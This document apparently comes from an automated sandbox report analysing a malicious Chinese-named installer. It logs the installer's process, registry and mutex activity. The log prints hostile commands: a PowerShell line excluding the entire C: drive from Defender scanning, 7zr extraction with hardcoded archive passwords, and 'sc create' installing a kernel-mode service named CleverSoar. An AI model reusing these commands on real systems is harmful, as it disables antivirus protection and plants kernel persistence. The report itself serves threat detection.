Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 004FFB10 appears 723 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 004628E3 appears 34 times
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.5.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.0.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.5.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exeStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.2106628910.000000007FBAA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_1.0.9.exe
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000000.2104010579.0000000000F79000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_1.0.9.exe
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.2105940468.000000000363E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_1.0.9.exe
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exeBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_1.0.9.exe
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.drBinary string: \Device\TfSysMon
Source: tProtect.dll.12.drBinary string: \Device\TfKbMonPWLCache
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000002.2141358825.00000000014C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: XE;.BAT;.CMD;.VBp
Source: classification engineClassification label: mal76.evad.winEXE@141/32@0/0
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CE45D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6CE45D60
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00469313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,10_2_00469313
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00473D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_00473D66
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00469252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,10_2_00469252
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CE45240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW,6_2_6CE45240
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile created: C:\Program Files (x86)\Windows NT\is-JD8VI.tmpJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5664:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4836:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5264:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4920:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5708:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5976:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5036:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7008:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4980:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1172:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5064:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5308:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3924:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1176:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3776:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5764:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3300:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1428:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4072:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6292:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1488:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3052:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2052:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1908:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1464:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6888:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1436:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5372:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4972:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2724:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4328:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4980:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2656:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeFile created: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmpJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.drBinary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'cannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %sno such column: "%s"cannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygon
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.drBinary or memory string: SELECT %s WHERE rowid = ?SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %sinvalid rootpageorphan indexsqlite_stat%dDELETE FROM %Q.%s WHERE %s=%QDELETE FROM %Q.sqlite_master WHERE name=%Q AND type='trigger'corrupt schemaUPDATE %Q.sqlite_master SET rootpage=%d WHERE #%d AND rootpage=#%dstattable %s may not be droppeduse DROP TABLE to delete table %suse DROP VIEW to delete view %stblDELETE FROM %Q.sqlite_sequence WHERE name=%QDELETE FROM %Q.sqlite_master WHERE tbl_name=%Q and type!='trigger' UNIQUEindexcannot create a TEMP index on non-TEMP table "%s"table %s may not be indexedviews may not be indexedvirtual tables may not be indexedthere is already a table named %sindex %s already existssqlite_autoindex_%s_%dexpressions prohibited in PRIMARY KEY and UNIQUE constraintsconflicting ON CONFLICT clauses specifiedCREATE%s INDEX %.*sINSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);name='%q' AND type='index'table "%s" has more than one primary keyAUTOINCREMENT is only allowed on an INTEGER PRIMARY KEYTABLEVIEW
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeFile read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeProcess created: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp "C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$203D4,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe"
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeProcess created: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp "C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$203E2,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENT
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeProcess created: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp "C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$203D4,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeProcess created: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp "C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$203E2,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
